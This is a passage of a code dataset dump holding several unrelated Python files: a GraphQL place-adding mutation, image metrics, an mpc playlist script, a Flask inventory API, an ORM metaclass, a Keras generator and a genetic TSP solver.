CoinChange\n\n\nclass PlaceAddition(ObjectType):\n added_place = graphene.Field(type_=PlaceType)\n coin_change = graphene.Field(type_=CoinChange)\n\n\nclass PlaceDataInput(graphene.InputObjectType):\n name = graphene.String(required=True)\n category_id = graphene.String(required=True)\n coordinate_longitude = graphene.Float(required=True)\n coordinate_latitude = graphene.Float(required=True)\n\n address = graphene.String()\n description = graphene.String()\n\n\nclass SecretPlaceExtraInput(graphene.InputObjectType):\n food_suggestion = graphene.String()\n time_suggestion = graphene.String()\n company_suggestion = graphene.String()\n music_suggestion = graphene.String()\n extra_suggestion = graphene.String()\n\n\nclass MutationAddPlace(graphene.Mutation):\n class Arguments:\n place_data = PlaceDataInput()\n secret_place_extra = SecretPlaceExtraInput()\n\n coin_change = graphene.Field(type_=CoinChange)\n new_place = graphene.Field(type_=PlaceType)\n\n @classmethod\n async def mutate(\n cls, root, info, place_data: dict, secret_place_extra: dict | None = None\n ):\n session: AsyncSession = info.context.session\n user_id = await AuthChecker.check_auth_mutation(session=session, info=info)\n possible_actions = await ActionsEconomy.verify_possibility(\n session=session, user_id=user_id\n )\n new_place = await basic_mapper(Place, place_data)\n new_place[Place.owner_id] = user_id\n place_category = (\n await session.execute(\n sa.select(Category.id, Category.name).where(\n Category.id == new_place[Place.category_id]\n )\n )\n ).fetchone()\n\n is_secret_place = place_category.name == s.SECRET_PLACE_NAME\n\n if not is_secret_place and secret_place_extra is not None:\n Exc.value(\n message=\"It is not possible to enter the data of a secret place in a normal place\",\n of_group=ExceptionGroupEnum.BAD_INPUT,\n reasons=ExceptionReasonEnum.INCORRECT_VALUE,\n )\n\n existing_places = (\n await session.execute(\n sa.select(Place.id).where(\n sa.and_(\n Place.owner_id == user_id,\n Place.category_id == place_category.id,\n )\n )\n )\n ).fetchall()\n if existing_places:\n action_name = (\n \"Create new secret place\"\n if is_secret_place\n else \"Create a new place of the same 
category\"\n )\n else:\n action_name = (\n \"Create first secret place\" if is_secret_place else \"Create a place\"\n )\n # TODO return how much more coins is needed - Ougen\n if not possible_actions[action_name]:\n Exc.low_wallet(\n message=\"Insufficient coins\",\n of_group=ExceptionGroupEnum.BAD_BALANCE,\n reasons=ExceptionReasonEnum.LOW_BALANCE,\n )\n\n # adding a place to db\n if is_secret_place and secret_place_extra:\n new_secret_place_data = await basic_mapper(\n SecretPlaceExtra, secret_place_extra\n )\n secret_place_id = (\n await session.execute(\n sa.insert(SecretPlaceExtra)\n .values(new_secret_place_data)\n .returning(SecretPlaceExtra.id)\n )\n ).scalar()\n else:\n secret_place_id = None\n new_place[Place.secret_extra_id] = secret_place_id\n uploaded_place_id = (\n (\n await session.execute(\n sa.insert(Place).values(new_place).returning(Place.id)\n )\n )\n .fetchone()\n .id\n )\n\n # setting for all other places of the same type on fire\n time_to_decay = datetime.datetime.now() + datetime.timedelta(\n hours=s.PLACE_DECAY_DURATION_HOURS\n )\n # set some places on fire\n await session.execute(\n sa.update(Place)\n .where(\n sa.and_(\n Place.owner_id == user_id,\n Place.id != uploaded_place_id,\n Place.category_id == place_category.id,\n Place.active_due_date.is_(None),\n )\n )\n .values({Place.active_due_date: time_to_decay})\n .returning(Place.id)\n )\n\n coin_change = await ActionsEconomy.execute(\n session=session, action_name=action_name, coin_receiver_user_id=user_id\n )\n return MutationAddPlace(\n coin_change=coin_change,\n new_place=PlaceType.get_node(info, uploaded_place_id),\n )\n\n\nasync def basic_mapper(classtype, value):\n # TODO Document this piece of code - Ougen*\n # TODO remove async pollution here - Ougen*\n new_value = {}\n for attr, attr_val in value.items():\n if \"id\" in attr:\n attr_val = decode_gql_id(attr_val)[1]\n if hasattr(classtype, attr):\n new_value[getattr(classtype, attr)] = attr_val\n return new_value\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"gql/mutations/add_place.py","file_name":"add_place.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4941342603","text":"import numpy as np\nimport cv2\n\ndef max_contour(inp_img):\n\n norm_image = cv2.normalize(inp_img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,25,255,cv2.THRESH_BINARY)[1]\n\n contours,_ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n max = [0,0,0,0]\n\n for c in contours:\n x,y,w,h = cv2.boundingRect(c)\n\n if w*h > max[2]*max[3]:\n max = [x,y,w,h]\n point1 = (max[0],max[1]+max[3])\n point2 = (max[0]+max[2],max[1])\n\n angle = np.arctan(max[3]/max[2])\n \n return point1, point2, angle\n\ndef pred_needle_img(point1, point2, size=(440, 500)):\n\n zeros = np.zeros(size)\n cv2.line(zeros, point1, point2, (255,255,255), 2)\n \n return zeros\n\ndef inline_BB(point1, point2, shape, a = 15):\n \n x1, y1 = point1\n x2, y2 = point2\n\n zeros = np.zeros(shape)\n cv2.line(zeros, (x1, y1), (x2, y2), (255,255,255), 1)\n\n tan = -1*(y1-y2)/(x1-x2)\n theta = np.arctan(tan)\n\n cos_minus_sin = np.cos(theta) - np.sin(theta)\n\n cos_plus_sin = np.cos(theta) + np.sin(theta)\n\n point1 = [x1-a*cos_minus_sin, y1 + a*cos_plus_sin]\n point2 = [x1-a*cos_plus_sin, y1 - a*cos_minus_sin]\n point3 = [x2 + a*cos_minus_sin, y2 - 
a*cos_plus_sin]\n point4 = [x2 + a*cos_plus_sin, y2 + a*cos_minus_sin]\n\n pts = np.array([point1, point2, \n point3, point4],\n np.int32)\n\n image = cv2.polylines(zeros, [pts], True, (255,255,255), 1)\n return image\n\ndef max_contour(img):\n norm_image = cv2.normalize(img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,127,255,cv2.THRESH_BINARY)[1]\n\n contours, _ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n output = np.zeros_like(img)\n if len(contours) != 0:\n c = max(contours, key = cv2.contourArea)\n cv2.drawContours(output, [c], -1, 255, -1)\n\n return output\n\ndef angle_acc(act_angle, pred_angle):\n return (act_angle-pred_angle)**2\n\ndef dist_acc(pred_point1, pred_point2, act_point1, act_point2, size):\n\n center = np.array(size)/2\n\n pred_point1 = np.array(pred_point1)\n pred_point2 = np.array(pred_point2)\n \n pred_dist = np.cross(pred_point2-pred_point1,center-pred_point1)/np.linalg.norm(pred_point2-pred_point1)\n\n act_point1 = np.array(act_point1)\n act_point2 = np.array(act_point2)\n \n act_dist = np.cross(act_point2-act_point1,center-act_point1)/np.linalg.norm(act_point2-act_point1)\n \n return np.square(act_dist-pred_dist)\n\ndef dice_coef(y_true, y_pred):\n\n y_true_f = y_true.flatten()\n y_pred_f = y_pred.flatten()\n intersection = np.sum(y_true_f * y_pred_f)\n smooth = 0.0001\n return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)\n\ndef IOU(act_rect, pred_rect):\n\n intersection = np.logical_and(act_rect, pred_rect)\n union = np.logical_or(act_rect, pred_rect)\n \n iou_score = np.sum(intersection) / np.sum(union)\n \n return iou_score\n\ndef recall(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fn = np.sum(np.logical_and(act_rect, 1-pred_rect))\n recall = tp/(tp+fn)\n\n return recall\n\ndef precision(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fp = np.sum(np.logical_and(1-act_rect, pred_rect))\n precision = tp/(tp+fp)\n\n return precision\n \ndef F1(precision,recall):\n F1=2*precision*recall/(precision+recall)\n \n return F1","repo_name":"gupta-bhavesh/Curriculum_KD","sub_path":"needle/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18524626816","text":"import os\nfrom com.common import COLOR\nimport cv2\n\nclass SaveToFrame (object):\n def __init__(self,**kwargs):\n self.frame = kwargs['frame']\n self.f_path = kwargs['path']\n self.f_name = kwargs['filename']\n #self.frame_id = kwargs['frame_id']\n #self.x, self.y = kwargs['x'], kwargs['y']\n #self.s = kwargs['s']\n\n\n\n def create_full_frame(self):\n frame = os.path.join(self.f_path, self.f_name)\n print(COLOR.RED + frame + COLOR.END)\n cv2.imwrite(frame + '.png', self.frame)\n\n\n\n\n\n","repo_name":"igorfed/Annotation_v1","sub_path":"com/common_frame_files.py","file_name":"common_frame_files.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36126047171","text":"#!/usr/bin/env python3\n\n\"\"\"Playlist-manipulating mpc wrapper script.\n\nUsage:\n playlist [options]\n playlist [options] add \n playlist [options] add-from \n playlist [options] add-random \n playlist lyrics []\n playlist [options] pause-after-current []\n 
playlist repeat-current-once\n playlist -h | --help\n playlist --version\n\nOptions:\n -a, --all Add all items in the directory. Overrides `--number'.\n -h, --help Print this message and exit.\n -l, --filenames Print tracks as filenames instead of the default “artist — title format.\n -n, --number= Add this many items maximum. Set to `all' to add all items in the directory. Defaults to `all' for `add-random', and `1' for `add-from'.\n --version Print version info and exit.\n\"\"\"\n\nimport pathlib\nimport sys\n\nsys.path += ['/opt/py', str(pathlib.Path.home() / 'py')]\n\nimport contextlib\nimport os\nimport random\nimport re\nimport socket\nimport subprocess\n\nimport docopt # PyPI: docopt\nimport mpd # PyPI: python-mpd2\n\nimport syncbin\n\n__version__ = syncbin.__version__\n\nMPD_ROOT = pathlib.Path(os.environ.get('MPD_ROOT', '/Users/fenhl/Music'))\n\ndef client(host=None, port=6600, *, password=None, idle_timeout=None):\n if host is None:\n password, host = os.environ['MPD_HOST'].split('@')\n c = mpd.MPDClient()\n c.connect(host, port)\n if password is not None:\n c.password(password)\n if idle_timeout is not None:\n c.idletimeout = idle_timeout\n return c\n\ndef format_song(song, arguments={}):\n if not arguments.get('--filenames'):\n with contextlib.suppress(KeyError):\n return '{} — {}'.format(song['artist'], song['title'])\n return song['file']\n\nif __name__ == '__main__':\n arguments = docopt.docopt(__doc__, version='playlist from fenhl/syncbin ' + __version__)\n if arguments['add']:\n # add the given path to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n if (MPD_ROOT / path).is_dir():\n track_iterator = (MPD_ROOT / path).iterdir()\n else:\n track_iterator = iter([MPD_ROOT / path])\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n i = 0\n for f in sorted(track_iterator):\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 0\n if arguments['add-from']:\n # add files from the given path's parent, starting with the given path, to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n track_iterator = (MPD_ROOT / path).parent.iterdir()\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n found = False\n i = 0\n for f in sorted(track_iterator):\n if f.name.startswith(path.name):\n found = True\n if found:\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 1\n elif arguments['add-random']:\n tracks = subprocess.run(['mpc', 'ls', arguments['']], stdout=subprocess.PIPE, encoding='utf-8', check=True).splitlines()\n random.shuffle(tracks)\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (1 if arguments['--number'] is None else int(arguments['--number']))\n for i, track in enumerate(tracks):\n if i >= amount:\n break\n exit_status = subprocess.run(['mpc', 'add', track]).returncode\n if exit_status != 0:\n sys.exit(exit_status)\n elif arguments['lyrics']:\n sys.exit(subprocess.run(['eyeD3', arguments[''] or client().playlistid()[0]['file']]).returncode) #TODO only display lyrics, not other ID3 tags\n elif arguments['pause-after-current']:\n num_tracks = int(arguments['']) if arguments[''] else 1\n c = client(idle_timeout=1)\n for i in range(num_tracks):\n song = 
c.currentsong()\n print('[....] {}'.format(format_song(song, arguments)), end='\\r[....]', flush=True)\n if i == num_tracks - 1:\n c.single(1)\n try:\n while True:\n progress = min(4, int(5 * float(c.status()['elapsed']) / float(song['time'])))\n print('\\r[{}{}]'.format('=' * progress, '.' * (4 - progress)), end='', flush=True)\n try:\n c.idle('player')\n except socket.timeout:\n c = client(idle_timeout=1)\n if c.currentsong().get('id') != song['id']:\n break\n except KeyboardInterrupt:\n print('\\r[ ^C ] {}'.format(format_song(song, arguments)), flush=True)\n client().single(0)\n sys.exit(1)\n print('\\r[ ok ]', flush=True)\n c.single(0)\n elif arguments['repeat-current-once']:\n current = subprocess.run(['mpc', 'current', '--format=%file%'], stdout=subprocess.PIPE, encoding='utf-8', check=True)[:-1].decode('utf-8')\n sys.exit(subprocess.run(['mpc', 'insert', current]).returncode)\n else:\n c = client()\n for song in c.playlistid():\n if int(song['pos']) > 9999:\n print('[ ** ]', 'playlist truncated')\n break\n print('[{: >4}] {}'.format(int(song['pos']), format_song(song, arguments)))\n","repo_name":"fenhl/syncbin","sub_path":"python/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"7258457492","text":"from flask import Flask, request\nfrom model import db, Inventory\nfrom query_object.itemQO import ItemQO\nfrom query_object.filterQO import FilterQO\nfrom config import Config\n\napp = Flask(__name__)\nconfig = Config()\napp.config['SQLALCHEMY_DATABASE_URI'] = config.DB_PATH\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n request_data = request.get_json()\n itemQo = ItemQO(request_data.get('name', ''),\n request_data.get('category', ''),\n request_data.get('price', ''))\n return Inventory.insert(itemQo)\n\n\n@app.route('/filter', methods=['POST'])\ndef filter():\n request_data = request.get_json()\n filterQo = FilterQO(request_data.get('dt_from', ''),\n request_data.get('dt_to', ''))\n return Inventory.filter(filterQo)\n\n\n@app.route('/category', methods=['POST'])\ndef category():\n request_data = request.get_json()\n return Inventory.categorize(request_data.get('category', ''))\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"kingsleylow0327/inventory_management","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19134124233","text":"# JSON is commonly used with data APIs.\n# We can parse JSON into a Python dictionary.\n\nimport json\n\n# Sample JSON\nuserJson = '{\"firstName\": \"Louis\", \"lastName\": \"Higgins\", \"age\": 42}'\n\n# Parse to dictionary\nuser = json.loads(userJson)\n\nprint(user)\nprint(user['firstName'])\n\n# Parse dictionary to JSON\ncar = {'Make': 'Ford', 'Model': 'Mustang', 'Year': 1970}\ncarJson = json.dumps(car)\n\nprint(carJson)","repo_name":"misterjeff/Python","sub_path":"TraversyCrashCourse/pyJson.py","file_name":"pyJson.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32935155782","text":"from collections import OrderedDict\n\nfrom .relmanager import RelManager\nfrom .fields import Field, ForeignKey, OneToOneField\nfrom .utils import tznow\nfrom . 
import signals\n\n# Architecture\n#\n# This is complicated enough to warrant some explanation.\n#\n# A Model class has a Meta instance.\n#\n# The Fields are instances in the Meta instance.\n#\n# For a given Model, all Field instances are shared since there is only\n# one Meta instance for that Model class. This means that a field can't know\n# it's exact Model instance, only it's parent Model class.\n\n\n# from: http://stackoverflow.com/questions/12006267/how-do-django-models-work\n# from: lib/python2.7/site-packages/django/db/models/base.py\n#\n# remember that `type` is actually a class like `str` and `int`\n# so you can inherit from it\nclass MetaModel(type):\n \"\"\"\n *do not use this class directly*\n\n *code reviews of this class are very welcome*\n\n base class for :class:`alkali.model.Model`.\n\n this complicated metaclass is required to convert a stylized class\n into a useful concrete one. it converts :class:`alkali.fields.Field`\n variables into their base types as attributes on the instantiated\n class.\n\n **Meta**: adds a ``Meta`` class if not already defined in ``Model``\n derived class\n\n **objects**: :class:`alkali.manager.Manager`\n \"\"\"\n\n # this called once per Model _definition_\n # __new__ is the method called before __init__\n # meta_class is _this_ class, aka: MetaModel\n # this makes a new MetaModel instance\n def __new__(meta_class, name, bases, attrs):\n #print \"__new__ cls:\",type(meta_class),meta_class,name\n super_new = super(MetaModel, meta_class).__new__\n\n # Also ensure initialization is only performed for subclasses of Model\n # (excluding Model class itself). This keeps all of Models attrs intact.\n if not any( map( lambda b: isinstance(b, MetaModel), bases ) ):\n new_class = super_new(meta_class, name, bases, attrs)\n return new_class\n\n # new_class is an instance of 'name' (aka Model) whose type is MetaModel\n # print \"new_class\", type(new_class), new_class\n # new_class \n new_class = super_new(meta_class, name, bases, {})\n new_class._add_meta( attrs )\n new_class._add_fields()\n new_class._add_manager()\n new_class._add_relmanagers()\n new_class._add_exceptions()\n\n # put the rest of the attributes (methods and properties)\n # defined in the Model derived class into the \"new\" Model\n for name, attr in attrs.items():\n setattr(new_class, name, attr)\n\n signals.model_creation.send(meta_class, model=new_class)\n\n return new_class\n\n def _add_manager( new_class ):\n from .manager import Manager\n setattr( new_class, 'objects', Manager(new_class) )\n\n def _add_relmanagers( new_class ):\n \"\"\"\n if this class has foreign keys then we need to add the\n reverse lookup into the *other* model\n \"\"\"\n for name, field in new_class.Meta.fields.items():\n if not isinstance(field, ForeignKey):\n continue\n\n # note the name=name in the lambda, this is vital to capture\n # the current value of name and not the last of the loop\n # more info: http://stackoverflow.com/questions/2295290\n rel_manager = property(\n lambda fm_instance, name=name: RelManager(fm_instance, new_class, name)\n )\n set_name = \"{}_set\".format(new_class.__name__).lower()\n setattr( field.foreign_model, set_name, rel_manager )\n\n signals.pre_delete.connect(\n new_class.objects.cb_delete_foreign,\n sender=field.foreign_model)\n\n if isinstance(field, OneToOneField):\n signals.post_save.connect(\n new_class.objects.cb_create_foreign,\n sender=field.foreign_model)\n\n def _add_exceptions( new_class ):\n from .model import ObjectDoesNotExist\n\n # dynamically create a new 
class types\n DoesNotExist = type('DoesNotExist', (ObjectDoesNotExist,), {} )\n EmptyPrimaryKey = type('EmptyPrimaryKey', (Exception,), {} )\n MultipleObjectsReturned = type('MultipleObjectsReturned', (Exception,), {} )\n\n setattr( new_class, 'ObjectDoesNotExist', ObjectDoesNotExist )\n setattr( new_class, 'DoesNotExist', DoesNotExist )\n setattr( new_class, 'EmptyPrimaryKey', EmptyPrimaryKey )\n setattr( new_class, 'MultipleObjectsReturned', MultipleObjectsReturned )\n\n def _add_meta( new_class, attrs ):\n\n def _get_fields( attrs ):\n return [(k, v) for k, v in attrs.items() if isinstance(v, Field)]\n\n def _get_field_order(attrs):\n \"\"\"\n returns field names in the order they were defined in the class\n \"\"\"\n fields = _get_fields(attrs)\n fields.sort(key=lambda e: e[1]._order)\n return [k for k, _ in fields]\n\n class Object():\n pass\n\n # Meta is an instance in Model class\n # all following properties on the Meta class, not instance\n meta = attrs.pop( 'Meta', Object )\n setattr( new_class, 'Meta', meta() )\n\n if not hasattr(meta, 'filename'):\n meta.filename = None\n\n if not hasattr(meta, 'storage'):\n meta.storage = None\n\n if not hasattr(meta, 'ordering'):\n meta.ordering = _get_field_order(attrs)\n\n meta.field_filter = lambda self, field_type: \\\n [n for n, f in self.fields.items() if isinstance(f, field_type)]\n\n # don't let user miss a field if they've defined Meta.ordering\n assert len(meta.ordering) == len(_get_fields(attrs)), \\\n \"missing/extra fields defined in Meta.ordering\"\n\n # put the fields into the meta class\n # meta.ordering contains field names, attrs contains Field types\n meta.fields = OrderedDict()\n for field in meta.ordering:\n meta.fields[field] = attrs.pop(field)\n delattr( meta.fields[field], '_order' )\n\n # make sure 'pk' isn't a field name, etc\n for d in ['pk']:\n assert d not in meta.fields\n\n # you can set a property on a class but it will only be called on an instance\n # I'd prefer this to be a read-only property but I guess that can't happen\n #\n # note: don't use a dict comprehension because interim dict will have keys\n # inserted in random order\n meta.pk_fields = OrderedDict(\n [(name, field) for name, field in meta.fields.items() if field.primary_key]\n )\n\n # monkey patch stupid fucking iterators\n meta.pk_fields._keys = meta.pk_fields.keys\n meta.pk_fields.keys = lambda: list(meta.pk_fields._keys())\n meta.pk_fields._values = meta.pk_fields.values\n meta.pk_fields.values = lambda: list(meta.pk_fields._values())\n\n meta.fields._keys = meta.fields.keys\n meta.fields.keys = lambda: list(meta.fields._keys())\n meta.fields._values = meta.fields.values\n meta.fields.values = lambda: list(meta.fields._values())\n\n if len(meta.fields):\n assert len(meta.pk_fields) > 0, \"no primary_key defined in fields\"\n\n def _add_fields( new_class ):\n \"\"\"\n put the Field reference into new_class\n \"\"\"\n meta = new_class.Meta\n\n # add properties to field\n for name, field in meta.fields.items():\n field._name = name\n fget = lambda self: getattr(self, '_name')\n setattr( field.__class__, 'name', property(fget=fget) )\n\n field._model = new_class\n fget = lambda self: getattr(self, '_model')\n setattr( field.__class__, 'model', property(fget=fget) )\n\n fget = lambda self: self.model.Meta\n setattr( field.__class__, 'meta', property(fget=fget) )\n\n # put fields in model\n for name, field in meta.fields.items():\n # make magic property model.fieldname_field that returns Field object\n fget = lambda self, name=name: 
self.Meta.fields[name]\n setattr( new_class, name + '__field', property(fget=fget) )\n\n # set the Field descriptor object on the model class\n # which makes it accessable on the model instance\n #\n # the field can't be a property to Meta.fields[name]\n # because then the descriptor-ness is lost and a normal\n # getattr is called on the model instance\n setattr( new_class, name, field )\n\n # creates a new instance of derived model, this is called each\n # time a Model instance is created\n def __call__(cls, *args, **kw):\n obj = cls.__new__(cls, *args)\n\n if 'pk' in kw:\n assert len(cls.Meta.pk_fields) == 1, \"can't currently set compound primary key via kwargs\"\n\n field_name = cls.Meta.pk_fields.keys()[0]\n assert field_name not in kw, \"can't pass in 'pk' and actual pk field name\"\n\n value = kw.pop('pk')\n kw[field_name] = value\n\n # put field values (int,str,etc) into model instance\n for name, field in cls.Meta.fields.items():\n if getattr(field, 'auto_now', False):\n value = kw.pop(name, tznow().isoformat())\n elif getattr(field, 'auto_now_add', False):\n value = kw.pop(name, tznow().isoformat())\n else:\n # THINK: this somewhat duplicates Field.__set__ code\n value = kw.pop(name, field.default_value)\n\n value = field.cast(value)\n\n # store the actual value in the model's __dict__, used by Field.__get__\n obj.__dict__[name] = value\n\n obj._dirty = False\n obj.__init__(*args, **kw)\n\n return obj\n","repo_name":"kneufeld/alkali","sub_path":"alkali/metamodel.py","file_name":"metamodel.py","file_ext":"py","file_size_in_byte":10018,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"39"} +{"seq_id":"11723131283","text":"def generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size):\n i=0\n while 1:\n input_ids_b = input_ids[i*batch_size:(i+1)*batch_size]\n attention_mask_b = attention_mask[i*batch_size:(i+1)*batch_size]\n send_s_po_b = send_s_po[i*batch_size:(i+1)*batch_size]\n start_tokens_b = start_tokens[i*batch_size:(i+1)*batch_size]\n end_tokens_b = end_tokens[i*batch_size:(i+1)*batch_size]\n c_relation_b = c_relation[i*batch_size:(i+1)*batch_size]\n # 最重要的就是这个yield,它代表返回,返回以后循环还是会继续,然后再返回。就比如有一个机器一直在作累加运算,但是会把每次累加中间结果告诉你一样,直到把所有数加完\n yield({'input_1': input_ids_b, 'input_2': attention_mask_b,'input_3':send_s_po_b}, \n {'s_start': start_tokens_b,'s_end':end_tokens_b,'relation':c_relation_b})\n i = (i+1)%(len(input_ids)//batch_size)\n \nmodel.fit_generator(generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size),epochs=eopch,steps_per_epoch=steps_per_epoch,verbose=1,\n callbacks=[Metrics(model_2,model_3,id2p,va_text_list,va_spo_list,va_input_ids,va_attention_mask,tokenizer)])\n","repo_name":"zhengyanzhao1997/NLP-model","sub_path":"model/Trick/fit_generator.py","file_name":"fit_generator.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"39"} +{"seq_id":"31692147134","text":"import time\nimport numpy as np\nfrom tqdm import trange\nimport matplotlib.pyplot as plt\n\n\n\ndef PMX(ind1, ind2, separator_no=2):\n new_ind1, new_ind2 = ind1.copy(), ind2.copy()\n idxs = sorted(np.random.choice(len(ind1), separator_no, replace=False))\n \n group = np.random.choice(separator_no-1)\n start, end = idxs[group], idxs[group+1]\n \n tmp = ind1[start:end].copy()\n ind1[start:end] = ind2[start:end]\n ind2[start:end] = tmp\n \n for i in range(len(ind1)):\n if start <= i < end:\n continue\n \n 
while ind1[i] in ind1[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind1[start:end] == ind1[i])[0][0]\n ind1[i] = ind2[start+idx_of_elem]\n \n while ind2[i] in ind2[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind2[start:end] == ind2[i])[0][0]\n ind2[i] = ind1[start+idx_of_elem]\n\n return ind1, ind2\n\ndef tsp_objective_function(p, dist):\n s = 0.0\n for i in range(len(p)):\n s += dist[p[i-1], p[i]]\n return s\n\ndef reverse_sequence_mutation(p, *args):\n a = np.random.choice(len(p), 2, False)\n i, j = a.min(), a.max()\n q = p.copy()\n q[i:j+1] = q[i:j+1][::-1]\n return q\n\ndef default_generate_population_function(chromosome_length, population_size):\n current_population = np.array([np.random.permutation(chromosome_length).astype(np.int64) \n for _ in range(population_size)])\n return current_population\n\n\nclass SGA:\n \n def __init__(self, population_size, chromosome_length, distance_matrix, crossover_func=PMX, objective_func=tsp_objective_function, mutation_func=reverse_sequence_mutation, generate_population_func=default_generate_population_function, replace_method='mu+lambda', number_of_offspring=None, crossover_probability = 0.95, mutation_probability = 0.25, number_of_iterations = 250, no_groups=2):\n \n self.population_size = population_size\n self.chromosome_length = chromosome_length\n \n self.crossover_func = crossover_func\n self.objective_func = objective_func\n self.mutation_func = mutation_func\n self.generate_population_func = generate_population_func\n self.distance_matrix = distance_matrix\n \n if number_of_offspring is None:\n number_of_offspring = population_size\n self.number_of_offspring = number_of_offspring\n self.crossover_probability = crossover_probability\n self.mutation_probability = mutation_probability\n self.number_of_iterations = number_of_iterations\n assert replace_method in ['mu+lambda', 'lambda'], 'wrong replace_method: [\"mu+lambda\", \"lambda\"]'\n self.replace_method = replace_method\n self.no_groups = no_groups\n \n \n def run(self, verbose=False, with_tqdm=False):\n time0 = time.time()\n self.mean_costs = np.zeros(self.number_of_iterations)\n self.min_costs = np.zeros(self.number_of_iterations)\n self.max_costs = np.zeros(self.number_of_iterations)\n\n self.best_objective_value = np.Inf\n self.best_chromosome = np.zeros((1, self.chromosome_length))\n\n current_population = self._generate_random_population()\n objective_values = np.array(list(map(lambda ind: self.objective_func(ind, self.distance_matrix), current_population)))\n \n if with_tqdm:\n range_ = trange(self.number_of_iterations, position=0, leave=True)\n else:\n range_ = range(self.number_of_iterations)\n \n for t in range_:\n parent_indices = self._select_parent_indices(objective_values)\n\n children_population = self._generate_children_population(current_population, parent_indices)\n\n self._mutate_children_population(children_population)\n\n children_objective_values = self._eval_children(children_population)\n \n current_population, objective_values = self._replace_population(current_population, objective_values, children_population, children_objective_values)\n\n # recording some statistics\n if self.best_objective_value < objective_values[0]:\n self.best_objective_value = objective_values[0]\n self.best_chromosome = current_population[0, :]\n \n self.mean_costs[t] = objective_values.mean()\n self.min_costs[t] = objective_values.min()\n self.max_costs[t] = objective_values.max()\n \n if verbose:\n print('%3d %14.8f %12.8f %12.8f 
%12.8f %12.8f' % (t, time.time() - time0, objective_values.min(), objective_values.mean(), objective_values.max(), objective_values.std()))\n \n \n def plot_costs(self, title=''):\n plt.title(title)\n plt.plot(self.max_costs, label='max')\n plt.plot(self.min_costs, label='min')\n plt.plot(self.mean_costs, label='mean')\n plt.show()\n \n \n def _generate_random_population(self):\n return self.generate_population_func(self.chromosome_length, self.population_size)\n \n \n def _generate_children_population(self, current_population, parent_indices):\n children_population = np.zeros((self.number_of_offspring, self.chromosome_length), dtype=np.int64)\n \n for i in range(self.number_of_offspring//2):\n if np.random.random() < self.crossover_probability:\n children_population[2*i, :], children_population[2*i+1, :] = self.crossover_func(current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1], :].copy(), self.no_groups)\n else:\n children_population[2*i, :], children_population[2*i+1, :] = current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1]].copy()\n\n if np.mod(self.number_of_offspring, 2) == 1:\n children_population[-1, :] = current_population[parent_indices[-1], :]\n \n return children_population\n \n \n def _select_parent_indices(self, objective_values):\n fitness_values = objective_values.max() - objective_values\n \n if fitness_values.sum() > 0:\n fitness_values = fitness_values / fitness_values.sum()\n else:\n fitness_values = np.ones(self.population_size) / self.population_size\n parent_indices = np.random.choice(self.population_size, self.number_of_offspring, \n True, fitness_values).astype(np.int64)\n return parent_indices\n \n \n def _mutate_children_population(self, children_population):\n for i in range(self.number_of_offspring):\n if np.random.random() < self.mutation_probability:\n children_population[i, :] = self.mutation_func(children_population[i, :], self.no_groups)\n \n \n def _eval_children(self, children_population):\n children_objective_values = np.zeros(self.number_of_offspring)\n for i in range(self.number_of_offspring):\n children_objective_values[i] = self.objective_func(children_population[i, :], self.distance_matrix)\n return children_objective_values\n \n \n def _replace_population(self, current_population, objective_values, children_population, children_objective_values):\n if self.replace_method == 'mu+lambda':\n objective_values = np.hstack([objective_values, 